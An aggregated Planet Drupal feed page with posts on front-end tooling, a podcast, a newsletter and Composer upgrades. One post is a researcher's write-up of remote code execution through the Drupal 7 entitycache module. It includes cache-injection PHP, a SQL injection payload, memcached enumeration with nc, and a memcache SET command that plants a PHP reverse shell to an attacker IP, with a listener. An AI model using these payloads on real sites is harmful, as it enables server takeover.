Planet Drupal
LN Webworks: Google Tag Manager With Drupal : All You Need to Know
Maximizing website engagement and interactivity is a major goal of all marketers. However, the management of multitudinous third-party integrations and tracking tools is a laborious task. Gladly, Google created Google Tag Manager to simplify the complicated lives of marketing teams worldwide. It makes managing, upgradation, and tracking of tags, snippets, and third-party integrations a piece of cake for them.
The best part is that this platform is intuitive and user-friendly which contributes a fair share in its massive appeal. If you own a Drupal website and wonder how to use Google Tag Manager with Drupal like many others, this blog is all you need. It elucidates everything in a detailed yet simplified manner.
First, let’s delve into what Google Tag Manager is and what makes it special.
Tag1 Consulting: A Guide to Estimating Migrations - How Much Will My Drupal Migration Cost? Part 2/3
This podcast series focuses on the strategies involved in upgrading and migrating Drupal websites and applications.
Read more michaelemeyers Tue, 11/28/2023 - 06:00Specbee: Handling Custom Drupal Migrations Using SqlBase
Agiledrop.com Blog: Interview with John Faber of Chapter Three: Next-Drupal & securing the future of Drupal
PreviousNext: Drupal front-end nirvana with Vite, Twig and Storybook
We're proud to announce the release of vite-plugin-twig-drupal, a plugin for Vite that we hope will improve your workflow for front-end development with Drupal.
by lee.rowlands / 28 November 2023The problem spaceYou're working with Twig in a styleguide-driven-development process. You're writing isolated components that consist of CSS, Twig and JavaScript. You want to be able to use Twig to render your components for Storybook. You want fast refresh with Vite. You want Twig embeds, includes and extends to work. You want to use Drupal-specific twig features like create_attributes etc. You want compilation of PostCSS and SASS to CSS. You want Hot Module Reloading (HMR) so that you can see how your components look without needing to endlessly refresh.
Enter vite-plugin-twig-drupalThe Vite plugin Twig Drupal is a Vite plugin based on Twig JS for compiling Twig-based components into a JavaScript function so that they can be used as components with Storybook. It allows you to import Twig files into your story as though they are JavaScript files.
Comparison to other solutions- Vite plugin twig loader doesn't handle nested includes/embeds/extends. These are a fairly crucial feature of Twig when building a component library as they allow re-use and DRY principles
- Components library server requires you to have a running Drupal site. Whilst this ensures your Twig output is identical to that of Drupal (because Drupal is doing the rendering), it is a bit more involved to setup. If you're going to use single directory components or a similar Drupal module like UI patterns then this may be a better option for you.
This module is distributed via npm, which is bundled with node and should be installed as one of your project's devDependencies:
npm install --save-dev vite-plugin-twig-drupalYou then need to configure your vite.config.js.
import { defineConfig } from "vite" import twig from 'vite-plugin-twig-drupal'; import { join } from "node:path" export default defineConfig({ plugins: [ // Other vite plugins. twig({ namespaces: { components: join(__dirname, "/path/to/your/components"), // Other namespaces as required. }, // Optional if you are using React storybook renderer. The default is 'html' and works with storybook's html // renderer. // framework: 'react' }), // Other vite plugins. ], })With this config in place, you should be able to import Twig files into your story files.
ExamplesTo make use of a Twig file as a Storybook component, just import it. The result is a component you can pass to Storybook or use as a function for more complex stories.
// stories/Button.stories.js // Button will be a Javascript function that accepts variables for the twig template. import Button from './button.twig'; // Import stylesheets, this could be a sass or postcss file too. import './path/to/button.css'; // You may also have JavaScript for the component. import './path/to/some/javascript/button.js'; export default { title: 'Components/Button', tags: ['autodocs'], argTypes: { title: { control: { type: 'text' }, }, modifier: { control: { type: 'select' }, options: ['primary', 'secondary', 'tertiary'], }, }, // Just pass along the imported variable. component: Button, }; // Set default variables in the story. export const Default = { args: { title: 'Click me' }, }; export const Primary = { args: { title: 'Click me', modifier: 'primary' }, }; // Advanced example. export const ButtonStrip = { name: 'Button group', render: () => ` ${Button({title: 'Button 1', modifier: 'primary'})} ${Button({title: 'Button 2', modifier: 'secondary'})} ` }Here's how that might look in Storybook (example from the Admin UI Initiative storybook)
Dealing with Drupal.behaviorsIn cases where the JavaScript you import into your story file uses a Drupal behavior, you'll likely need some additional code in your Storybook configuration to handle firing the behaviors. Here at PreviousNext, we prefer to use a loadOnReady wrapper, which works with and without Drupal. However, if you're just using Drupal.behaviors something like this in your Storybook config in main.js (or main.ts) will handle firing the behaviors.
const config = { // ... existing config previewBody: (body) => ` window.Drupal = window.Drupal || {behaviors: {}}; window.drupalSettings = Object.assign(window.drupalSettings || {}, { // Mock any drupalSettings your behaviors need here. }); // Mock Drupal's once library too. window.once = (_, selector) => document.querySelectorAll(selector); document.addEventListener('DOMContentLoaded', () => { Object.entries(window.Drupal.behaviors).forEach(([key, object]) => object.attach(document)); }) ${body} ` // ... more config }Give it a tryWe're looking forward to using this plugin in client projects and are excited about the other possibilities Storybook provides us with, such as interaction and accessibility testing.
Thanks to early testers in the community, such as Ivan Berdinsky and Sean Blommaert, who've already submitted some issues to the github queue. We're really happy to see it in use in the Admin Initiative's work on a new toolbar.
Give it a try, and let us know what you think.
Tagged Storybook, Front End DevelopmentThe Drop Times: Droopler's Next Chapter: Grzegorz Pietrzak's Insights | Part 2
The Drop Times: Drupal Core 10.3.0 Upgrade Enables Seamless Integration of Computed Bundle Fields in Views
Talking Drupal: Talking Drupal #426 - Needs Review Queue Initiative
Today we are talking about The Needs Review Queue Initiative, What it is, and How it’s helping to improve Drupal with guest Stephen Mustgrave. We’ll also cover Translation Management Tool as our module of the week.
For show notes visit: www.talkingDrupal.com/426
Topics- Can you give an overview of Needs Review Issue Queue Initiative
- Is the bug smash initiative related to the needs review issue queue
- Is this the same as the needs review bot
- How many issues were in the Needs Review status when you started
- How many issues today
- How long did it take until it was manageable
- How long do items stay on average
- Who else is helping
- Let’s talk through the pagination heading level issue
- What help can the community provide
- How does someone get involved
- Do you think this helps with burnout for core committers
- What’s the future of the initiative
Stephen Mustgrave - smustgrave
HostsNic Laflin - nLighteneddevelopment.com nicxvan John Picozzi - epam.com johnpicozzi Melissa Bent - linkedin.com/in/melissabent merauluka
MOTW CorrespondentMartin Anderson-Clutz - @mandclu Translation Management Tool (TMGMT)
- Brief description:
- Have you ever wanted to automate the process of creating content translations on your Drupal site? There’s a module for that.
- Brief history
- How old: created in Jan 2012
- Versions available: 7.x-1.0-rc3 and 8.x-1.15, the latter of which works with Drupal 9 and 10
- Maintainership
- Actively maintained
- Test coverage
- Documentation
- Number of open issues: 595, 139 of which are bugs against the 8.x branch
- Usage stats:
- 8,766 sites
- Maintainer(s):
- Berdir, a very prolific maintainer in his own right, who also supports well known projects like Search API, Token, Paragraphs, and many more
- Module features and usage
- Provides a tool set for automating the process of creating translations for your site content, as well as strings used within the site like menus, interface text, and so on
- Works with more than 30 translation service providers, including many that leverage human translators, but also AI-based services like DeepL and OpenAI
- Also has a plugin system to determine what text needs to be translated, so it can be easily adapted to very custom needs
- With the module installed that Translate tab on your nodes changes to have buttons to request a translation in each language
- Once a translation has been requested, it will run through states like unprocessed, active, and finished
- Also provides an option for Continuous Translation, where new and updated content is automatically submitted for translation
- Allows for professional translation at scale, using whatever kind of service works best for your site
- The need for robust translation capabilities is what originally got me started using Drupal, so it’s great to see that there are enterprise-grade options for sites that need to manage translations at scale
mcdruid.co.uk: Remote Code Execution in Drupal via cache injection, drush, entitycache, and create_function
PHP's create_function() was:
DEPRECATED as of PHP 7.2.0, and REMOVED as of PHP 8.0.0
As the docs say, its use is highly discouraged.
PHP 7 is no longer supported by the upstream developers, but it'll still be around for a while longer (because, for example, popular linux distributions provide support for years beyond the upstream End of Life).
Several years ago I stumbled across a usage of create_function in the entitycache module which was open to abuse in quite an interesting way.
The route to exploitation requires there to be a security problem already, so the Drupal Security Team agreed there was no need to issue a Security Advisory.
The module has removed the problematic code so this should not be a problem any more for sites that are staying up-to-date.
This is quite a fun vulnerability though, so let's look at how it might be exploited given the right (or should that be "wrong"?) conditions.
To be clear, we're talking about Drupal 7 and (probably) drush 8. The latest releases of both are now into double digits.
Is it unsafe input?Interestingly, the issue is in a drush specific inc file:
/** * Implements hook_drush_cache_clear(). */ function entitycache_drush_cache_clear(&$types) { $entities = entity_get_info(); foreach ($entities as $type => $info) { if (isset($info['entity cache']) && $info['entity cache']) { // You can't pass paramters to the callbacks in $types, so create an // anonymous function for each specific bin. $lamdba = create_function('', "return cache_clear_all('*', 'cache_entity_" . $type . "', TRUE);"); $types['entitycache-' . str_replace('_', '-', $type)] = $lamdba; } } }https://git.drupalcode.org/project/entitycache/-/blob/7.x-1.5/entitycach...
Let's remind ourselves of the problem with create_function(); essentially it works in a very similar way to calling eval() on the second $code parameter.
So - as is often the case - it's very risky to pass unsafe user input to it.
In this case, we might not even consider the $type variable to be user input; it comes from the array keys returned by entity_get_info().
Is there really a problem here? Well only if an attacker were able to inject something into those array keys. How might that happen?
entity_cache_info() uses a cache to minimise calls to implementations of hook_entity_info.
If an attacker is able to inject something malicious into that cache, there could be a path to Remote Code Execution here.
Let's just reiterate that this is a big "IF"; an attacker having the ability to inject things into cache is obviously already a pretty significant problem in the first place.
How might that come about? Perhaps the most obvious case would be a SQL Injection (SQLi) vulnerability. Assuming a site keeps its default cache bin in the database, a SQLi vulnerability might allow an attacker to inject their payload. We can look more closely at how that might work, but note that the entitycache project page says:
Don't bother using this module if you're not also going to use http://drupal.org/project/memcache or http://drupal.org/project/redis - the purpose of entitycache is to allow queries to be offloaded from the database onto alternative storage. There are minimal, if any, gains from using it with the default database cache.
So perhaps it's not that likely that a site using entitycache would have its cache bins in the database.
We'll also look at how an attacker might use memcache as an attack vector.
Proof of ConceptTo keep things simple initially, we'll look at conducting the attack via SQL.
Regardless of what technology the victim site is using for caching, the attack needs to achieve a few objectives.
As we consider those, keep in mind that the vulnerable code is within an implementation of hook_drush_cache_clear, so it will only run if and when caches are cleared via drush.
Objectives
- The malicious payload has to be injected into the array keys of the cached data returned by entity_cache_info().
- The injection cannot break Drupal so badly that drush cannot run a cache clear.
- However, the attacker may wish to deliberately break the site sufficiently that somebody will attempt to remedy the problem by clearing caches (insert "keep calm and clear cache" meme here!).
We can see that relevant cache item here is:
$cache = cache_get("entity_info:$langcode")The simplest possible form of attack might be to try to inject a very simple array into that cache item, with the payload in an array key. For example:
array('malicious payload' => 'foo');Let's look at what we'd need to do to inject this array into the site's cache so that this is what entity_cache_info() will return.
The simplest way to do this is to use a test Drupal 7 site and the cache API. Note that we're highly likely to break the D7 site along the way.
We can use drush to run some simple code that stores our array into the cache:
$ drush php >>> $entity_info = array('malicious payload' => 'foo'); => [ "malicious payload" => "foo", ] >>> cache_set('entity_info:en', $entity_info);Now let's look at the cache item in the db:
$ drush sqlc > SELECT * FROM cache WHERE cid = 'entity_info:en'; +----------------+-------------------------------------------+--------+------------+------------+ | cid | data | expire | created | serialized | +----------------+-------------------------------------------+--------+------------+------------+ | entity_info:en | a:1:{s:17:"malicious payload";s:3:"foo";} | 0 | 1696593295 | 1 | +----------------+-------------------------------------------+--------+------------+------------+Okay, that's pretty simple; we can see that the array was serialized. (Of course the fact that the cache API will unserialize this data may lead to other attack vectors if there's a suitable gadget chain available, but we'll ignore that for now.)
How is the site doing now? Let's try a drush status:
$ drush st Error: Class name must be a valid object or a string in entity_get_controller() (line 8216 of /var/www/html/includes/common.inc). Drush was not able to start (bootstrap) Drupal. Hint: This error can only occur once the database connection has already been successfully initiated, therefore this error generally points to a site configuration issue, and not a problem connecting to the database.That's not so great, and importantly we get the same error when try to clear caches by running drush cc all.
We've broken the site so badly that drush cannot bootstrap Drupal sufficiently to run a cache clear, so we've failed to meet the objectives.
The site can be restored by manually removing the injected cache item, but this means the attack was unsuccessful.
It seems we need to be a bit more surgical when injecting the payload into this cache item, as Drupal's bootstrap relies on being able to load some valid information from it.
We could just take the valid default value for this cache item and inject the malicious payload on top of that, but it's quite a lot of serialized data (over 13kb) and is therefore quite cumbersome to manipulate.
Through a process of trial and error, using Xdebug to step through the code, we can derive some minimal valid data that needs to be present in the cache item for drush to be able to bootstrap Drupal far enough to run a cache clear.
It's mostly the user entity that needs to be somewhat intact, but there's also a dependency on the file entity that requires a vaguely valid array structure to be in place.
Here's an example of a minimal array that we can use for the injection that allows a sufficiently full bootstrap:
$entity_info['user'] = [ 'controller class' => 'EntityCacheUserController', 'base table' => 'users', 'entity keys' => ['id' => 'uid'], 'schema_fields_sql' => ['base table' => ['uid']], 'entity cache' => TRUE, ]; $entity_info = [ 'user' => $entity_info['user'], 'file' => $entity_info['user'], 'malicious payload' => $entity_info['user'] ];Note that it seems only the user entity really needs the correct entity controller and db information, so we can reuse some of the skeleton data. It may be possible to trim this back further.
Let's try injecting that into the cache via drush php and then checking whether drush is still functional.
It's convenient to put the injection code into a script so we can iterate on it easily - the $entity_info array is the same as the code snippet above.
$ cat cache_injection.php <?php $entity_info['user'] = [ 'controller class' => 'EntityCacheUserController', 'base table' => 'users', 'entity keys' => ['id' => 'uid'], 'schema_fields_sql' => ['base table' => ['uid']], 'entity cache' => TRUE, ]; $entity_info = [ 'user' => $entity_info['user'], 'file' => $entity_info['user'], 'malicious payload' => $entity_info['user'] ]; cache_set('entity_info:en', $entity_info); $ drush scr cache_injection.php $ drush st Drupal version : 7.99-dev ...snip - no errors... $ drush ev 'print_r(array_keys(entity_get_info()));' Array ( [0] => user [1] => file [2] => malicious payload )We can successfully run drush cc all with this in place, but all that this achieves is blowing away our injected payload and replacing it with clean values generated by hook_entity_info.
$ drush cc all 'all' cache was cleared. $ drush ev 'print_r(array_keys(entity_get_info()));' Array ( [0] => comment [1] => node [2] => file [3] => taxonomy_term [4] => taxonomy_vocabulary [5] => user )We're making progress though.
Let's try putting an actual payload into the array key in our script:
$ tail -n7 cache_injection.php $entity_info = [ 'user' => $entity_info['user'], 'file' => $entity_info['user'], 'foo\', TRUE);} echo "code execution successful"; //' => $entity_info['user'] ]; cache_set('entity_info:en', $entity_info); $ drush scr cache_injection.php $ drush ev 'print_r(array_keys(entity_get_info()));' Array ( [0] => user [1] => file [2] => foo', TRUE);} echo "code execution successful"; // ) $ drush cc all code execution successfulcode execution successful'all' cache was cleared.Great, so it's not very pretty but we've achieved code execution when the cache was cleared via drush.
A real attacker would no doubt want to do a bit more than just printing messages. As is often the case, escaping certain characters can be a bit tricky but you can squeeze quite a useful payload into the array key.
Having said we've achieved code execution, so far we got there by running PHP code through drush. If an attacker could do this, they don't really need to mess around with injecting payloads into the caches.
Let's work backwards now and see how this attack might work with more limited access whereby injecting data into the cache is all we can do.
Attack via SQLiIf we re-run the injection script but don't clear caches, we can look in the db to see what ended up in cache.
$ drush sqlq 'SELECT data FROM cache WHERE cid = "entity_info:en";' a:3:{s:4:"user";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}s:4:"file";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}s:50:"foo', TRUE);} echo "code execution successful"; //";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}}This is not very pretty to look at, but we can see our array has been serialized.
If we have a SQLi vulnerability to play with, it's not hard to inject this payload straight into the db.
To simulate using a payload in a SQLi attack we could store the data in a file then send it to the db in a query. We'll empty out the cache table first to prove that it's our injected payload achieving execution.
After wiping the cache manually like this, we'll call drush status to repopulate the cache with valid entries. This means we can use an UPDATE statement (as opposed to doing an INSERT if the caches are initially empty), which is a more realistic simulation of attacking a production site.
Note also that we have to ensure that any quotes in our payload are escaped appropriately, and that we don't have any newlines in the middle of our SQL statement.
I often think fiddly things like this are the hardest part of developing these PoC exploits!
# inject the payload using a drush script $ drush scr cache_injection.php # extract the payload into a SQL statement stored in a file $ echo -n "UPDATE cache SET data = '" > sqli.txt $ drush sqlq 'SELECT data FROM cache WHERE cid = "entity_info:en";' | sed "s#'#\\\\'#g" | tr -d "\n" >> sqli.txt $ echo "' WHERE cid = 'entity_info:en';" >> sqli.txt # empty the cache table, and repopulate it with valid entries $ drush sqlq 'DELETE FROM cache;' $ drush st # inject the payload, simulating SQLi $ cat sqli.txt | drush sqlc # execute the attack $ drush cc all code execution successful ...So we've now developed a single SQL statement that could be run via SQLi which will result in RCE when drush cc all is run on the victim site.
In an actual attack, the payload would be prepared on a separate test site and the injection would only happen via SQLi on the victim site.
However, as mentioned previously it's perhaps unlikely that a site using the entitycache module would be keeping its caches in the database.
Attack via memcacheHow about if the caches are in memcache; what might an attack look like then?
First we're going to assume that the attacker has network access to the memcached daemon. Hopefully this is quite unlikely in real life, but it's not impossible.
The objective of the attack will be exactly the same in that we want to inject a malicious payload into the array keys of the data cached for entity info.
The mechanics of how we might do so are a little different with a "memcache injection" though.
The Drupal memcache module (optionally) uses a key prefix to "namespace" cache items for a given site, which allows multiple applications to share the same memcached instance (and such a shared instance is one scenario in which this attack might take place).
In order to be able to inject a payload into a specific cache item, the attacker would need to find out what prefix is in use for the target site.
Here's an example of issuing a couple of commands over the network to a memcached instance in order to find out what the cache keys look like:
$ echo "stats slabs" | nc memcached 11211 | head -n2 STAT 2:chunk_size 120 STAT 2:chunks_per_page 8738 $ echo "stats cachedump 2 2" | nc memcached 11211 | head -n2 ITEM dd_d7-cache-.wildcard-node_types%3A [1 b; 0 s] ITEM dd_d7-cache-.wildcard-entity_info%3A [1 b; 0 s]This shows us that there's a Drupal site using a key prefix of dd_d7. A large site may be using multiple memcached slabs and this enumeration step may be a bit more complex.
So in this case the cache item we're looking to attack will have the key dd_d7-cache-entity_info%3Aen.
We can go through a very similar exercise to what we did with the SQL caches; using a test site to inject the minimal data structure we want into the cache, then extracting it to see exactly what it looks like when stored in a memcache key/value pair.
There are a couple of small complications we're likely to encounter with this workflow.
One of those is that Drupal typically uses compression by default in memcache. This is generally a good thing, but makes it harder to extract the payload we want to inject in plain text that's easy to manipulate.
If you've ever output a zip file or compressed web page in your terminal and ended up with a screen full of gobbledygook, that's the sort of thing that'll happen if you try to retrieve a compressed item directly from memcached.
We can get around this by disabling compression on our test site.
Another potential problem is that the memcache integration works a bit differently to database cache when it comes to expiry of items. By default, memcache won't return items once their expiry timestamp has passed, whereas the database cache will return stale items (for a while at least).
This means that if an attacker prepares a payload for memcache but leaves the expiry timestamp in tact, it's possible that the item will already be expired by the time the payload is injected into the target site, and the attack will not work.
It's not too hard to get around this by setting a fake timestamp that should avoid expiry. Note that there are at least two different types of expiry at play here; memcache itself has an expiry time, and Drupal's cache API has its own on top of this.
There's also the concept of cache flushes in Drupal memcache. It's out of scope to go into too much detail about that here, but the tl;dr is that the memcache module keeps track of when caches are flushed and tries not to return items that were stored before any such flush. An attack has more chance of succeeding if it also tries to ensure that the injected cache item doesn't fall foul of this as it'd then be treated as outdated and not returned.
Injecting an item into memcache will typically mean using the SET command.
The syntax for this command includes a flags parameter which is "opaque to the server" but is used by the PHP memcached extension to determine whether a cache item is compressed. This means that even if a site is using compression by default, an attacker can inject an uncompressed item and the application will not know the difference; the PHP integration handles the compression (or lack thereof).
Part of the syntax also tells the server how many bytes of data are about to be transmitted following the initial SET instruction. This means that if we manipulate the data we want to store in memcache, we have to ensure that the byte count remains correct.
We also need to ensure that the PHP serialized data remains consistent; for example if we change an IP address we need to ensure that the string its within still has the correct length e.g. s:80:\"foo' ...
Putting all of that together, and jumping through some more hoops to ensure that quotes are appropriately escaped, we might end up with something like the below:
$ echo -e -n "set dd_d7-cache-entity_info%3Aen 4 0 978\r\nO:8:\"stdClass\":6:{s:3:\"cid\";s:14:\"entity_info:en\";s:4:\"data\";a:3:{s:4:\"user\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}s:4:\"file\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}s:80:\"foo', TRUE);}\$s=fsockopen(\"172.19.0.1\",1337);\$p=proc_open(\"sh\",[\$s,\$s,\$s],\$i);//\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}}s:7:\"created\";i:TIMESTAMP;s:17:\"created_microtime\";d:TIMESTAMP.2850001;s:6:\"expire\";i:0;s:7:\"flushes\";i:999;}\r\n" | sed "s/TIMESTAMP/9999999999/g" | nc memcached 11211This should successfully inject a PHP reverse shell into the array keys, which gets executed when drush cc all is run and the vulnerable code passes each array key to create_function().
$ ./poison_entity_info.sh # this script contains the memcache set command above STORED $ drush ev 'print_r(array_keys(entity_get_info()));' Array ( [0] => user [1] => file [2] => foo', TRUE);}$s=fsockopen("172.19.0.1",1337);$p=proc_open("sh",[$s,$s,$s],$i);// ) $ drush cc all 'all' cache was cleared.Meanwhile in the attacker's terminal...
$ nc -nvlp 1337 Listening on 0.0.0.0 1337 Connection received on 172.19.0.3 58220 python -c 'import pty; pty.spawn("/bin/bash")' mcdruid @ drupal-7:/var/www/html$ head -n2 CHANGELOG.txt Drupal 7.xx, xxxx-xx-xx (development version) -----------------------We successfully popped an interactive reverse shell from the victim system when the drush cache clear command was run.
One final step in this attack might be to deliberately break the site just enough that the administrator will manually clear the caches to try to rectify the problem, but not so badly that clearing the caches with drush will not work.
Perhaps the injection into the entity_info cache item already achieves that goal?
Could this attack also be carried out via Redis? Probably.
I'm sharing the details of this attack scenario because I think it's an interesting one, and because well maintained sites should not be affected. In order to be exploitable the victim site has to be running an outdated version of the entitycache module, on PHP<8, and most importantly has to be vulnerable (or at least exposed) in quite a serious way; if an attacker can inject arbitrary data into a site's caches, they can do all sorts of bad things.
As always, the best advice for anyone concerned about their site(s) being vulnerable is to keep everything up-to-date; the latest releases of the entitycache module no longer call create_function().
Thanks to Greg Knaddison (greggles) for reviewing this post.
Tags: drupal-planetsecurityrcephpdrushThe Drop Times: The Transformative Power of Stories in the Drupal Community
Dear Readers,
"There's always room for a story that can transport people to another place."
—J.K. Rowling, Author of the Harry Potter Series.Stories wield an irresistible charm, not merely as narratives to absorb but as potent wellsprings of inspiration. With their unique ability to engage, convey essential messages, and kindle our imagination, stories have been passed down through generations, nestled in books, or shared through diverse media. They possess the remarkable power to evoke emotions and offer insights that resonate across cultures.
Beyond mere entertainment, stories often carry valuable lessons, acting as a bridge to connect individuals and fostering a sense of wonder and empathy. Through the art of storytelling, individuals gain fresh perspectives, discover motivation, and shape their understanding of the world and their identities.
In the Drupal community, Dries Buytaert, the visionary founder of Drupal, extends a heartfelt invitation. He encourages members to share their personal stories, illustrating how Drupal has left an indelible mark on their lives and careers. This initiative underscores the power of stories in nurturing community, collaboration, and shared experiences within the Drupal ecosystem.
As J.K. Rowling aptly notes, there's always room for stories that transport us to new realms. Within the Drupal community, these stories serve as a bridge connecting individuals through the transformative impact of Drupal on their professional journeys.
So, what is your Drupal story? Share and become part of the collective narrative that defines the Drupal experience.
Let us look into last week's stories by The Drop Times.
Last week, The Drop Times published part one of the interview featuring Grzegorz Pietrzak, a seasoned Tech Lead at Droptica specializing in PHP, Drupal, and Symfony. Engaging in a profound discussion with Thomas Alias K, a former sub-editor at TDT, Pietrzak shared distinguished perspectives on various facets of Drupal, the dynamic role of Droopler in corporate website development, and his insights into constructing effective PHP teams.
The latest featured stories by our sub-editor, Alka Elizabeth, dive into notable happenings within the Drupal community. An insightful examination of challenges encountered in Drupal Distributions and Recipes Initiative takes center stage as contributor Jim Birch sheds light on a pertinent issue. This discovery catalyzes an ongoing initiative to address and overcome challenges associated with these essential elements of Drupal development.
Further contributing to Drupal's evolution, an adjustment was proposed by Alex Pott in response to issue #339889, which is set to bring about a significant change in the upcoming 10.2.x version of the Drupal core. This modification aims to streamline the configuration system, eliminating the need to list configuration in 'getEditableConfigNames()' when using '#config_target' in forms. The goal is to enhance the developer experience by simplifying processes and eliminating redundant configuration declarations.
Additionally, a substantial change in Drupal Core has been implemented in version 10.2.x. The widely recognized EntityReferenceTestTrait has undergone a renaming to EntityReferenceFieldCreationTrait. Behind this transformative modification is the dedicated effort of contributor Stephen Mustgrave, and it officially took effect on November 16, 2023.
DrupalCon Portland 2024 is currently seeking volunteers and summit contributors. Florida DrupalCamp 2024 is gearing up for its sixteenth annual event and searching for sponsors. The event will happen at the Florida Technical College in Orlando. If you're interested in sponsoring Florida DrupalCamp 2024 or would like to get more information about the event, including dates, available training sessions, and registration details, head nowhere else. Learn more about this weeks Drupal events here.
MidCamp, the Midwest Drupal Camp, has officially opened its call for session submissions for its 2024 event. Additionally, FOSDEM, the renowned free software event fostering collaboration and idea sharing within the open-source community, invites participation in presentations for its upcoming twenty-fourth edition scheduled for February 3rd and 4th, 2024.
Specbee published a blog exploring the significance of Drupal 10 Theming. Additionally, they are hosting a webinar titled "Getting Started with Drupal 10 Theming," scheduled for December 6, 2023.
The Acquia Engage conference ended discussions centered around experimentation and exploration. These emerging trends were featured in an article by Dom Nicastro. Discover the enhanced capabilities of the Drupal platform with the introduction of new features and improvements in Drupal 10.1. Dive deeper into these updates by reading the blog.
The digital landscape undergoes further evolution as PHP unveils its newest version, PHP 8.3. This latest iteration, packed with a myriad of enhancements and refinements, is poised to make a substantial impact on web development.
Lucio Waßill's demonstration on the Migrate Module provided valuable insights into establishing a demo-ready Drupal environment. The emphasis was on optimizing content creation processes by effectively utilizing the Migrate module.
Prepare for the imminent arrival of Drupal Gutenberg 3, as the beta version is now available for testing under Gutenberg 3.0.0-beta1. Users eager to integrate this update into Drupal 10 can seamlessly do so using Composer with the installation command. Revamp Drupal search boxes effortlessly with the Better Search Block: a user-friendly solution developed by 3C Web Services and maintained by Yogesh Pawar. This module stands out for its ability to enhance both the visual appeal and functionality of Drupal search boxes.
Dries Buytaert, the visionary behind Drupal, extends a heartfelt invitation to the Drupal community, encouraging individuals to share their personal narratives on Drupal's profound impact on their lives and careers.
Explore enhanced Drupal development efficiency by delving into the synergy between Visual Studio Code and DDEV in OSTraining's latest blog post. Gain practical insights into leveraging Visual Studio Code, a widely used and robust source-code editor, to streamline and optimize your Drupal development workflows. Droptica releases Drupal Website Maintenance Guide, a comprehensive e-book tailored for Drupal website owners seeking effective strategies for support, care, and maintenance.
So these are the highlights from TheDropTimes. Feel free to contact us with any suggestions, contributions, or feedback. Thank you for being a part of our community. Until the next edition, keep exploring, sharing, and embracing the power of knowledge! Follow us on LinkedIn, Twitter and Facebook.
Sincerely,
Elma John
Sub-editor, The DropTimes
Four Kitchens: Using Composer for modules not ready for the next major version of Drupal
Senior Support Lead
Allan brings technological know-how and grounds it with some simple country living. His interests include DevOps, animal husbandry (raising rabbits and chickens), hiking, and automated testing.
January 1, 1970
At the time of this blog, we have done two major version upgrades of Drupal and have refined the process along the way. There has been a lot of work in the community, through the efforts of people like Matt Glaman to make this process easier.
As a Support Engineer, I see a lot of approaches for achieving the same results in many areas of my work. Here, I’d like to share with you three different ways to achieve an upgrade of a module or theme that isn’t ready for the next major Drupal version, each with pros and cons, but all absolutely acceptable.
Why do we have this problem?All new Drupal developers have a hard time with the layers of code changes that happen in the Drupal community. We have custom package types, custom install locations, patches, and scaffolding. To make the challenges worse, we have two ways to identify a module’s dependencies — that being a .info.yml file and for some, a composer.json. This is because some Drupal modules may want to build upon an existing PHP library or project, in addition to other Drupal modules. To ease the pain of having to define some dependencies twice, both in the .info.yml file and composer.json file, Drupal.org built their packagist, a repository of Composer packages, to read the .info.yml files from the root of the project and create Composer version constraints from that. For example, if the .info file contained the following:
name: My Module type: module core_version_requirement: ^8.8 || ^9 dependencies: - ctools:ctoolsThen Drupal.org’s packagist would create the following for the release that contained that .info.yml file, saving the contributed developer a lot of trouble.
{ "type": "drupal-module", "name": "drupal/my_module", "require": { "drupal/core": "^8.8 || ^9", "drupal/ctools": "*" } }I hit on something there, though. It will create that for the release the .info.yml was in. When most code changes come in the form of patches, this poses a challenge. You apply your patch to the .info.yml after you download the release from Drupal.org’s packagist. Additionally, Drupal.org doesn’t create a new release entry for every patch file in the issue queue. So you are left with the question, “How do I install a module on Drupal 10 that requires Drupal 9 so that I can patch it to make it compatible for Drupal 10?”
Drupal LenientOne of the easiest methods for those who don’t understand the ins and outs of Composer is to use the Drupal Lenient plugin. It takes a lot of the manual work out of defining new packages and works with any drupal-* typed library. Types are introduced to us through the use of the Composer Installer plugin and manipulated further with something like Composer Installers Extender. Composer plugins can be quite powerful, but they ultimately add a layer of complexity to any project over using core composer tactics.
Drupal Lenient works by taking any defined package pulled in by any means via Composer, and replaces the version constraints for drupal/core currently, at the time of this writing, with “^8 || ^9 || ^10“. So where the requirements might look like the example earlier “drupal/core“: “^8.8 || ^9“, they are replaced, making it now possible to install alongside Drupal 10, even though it might not be compatible yet. This allows you to patch, test, or use the module as is, much like if you would have downloaded the zip and thrown it into your custom modules directory.
An example may look like this:
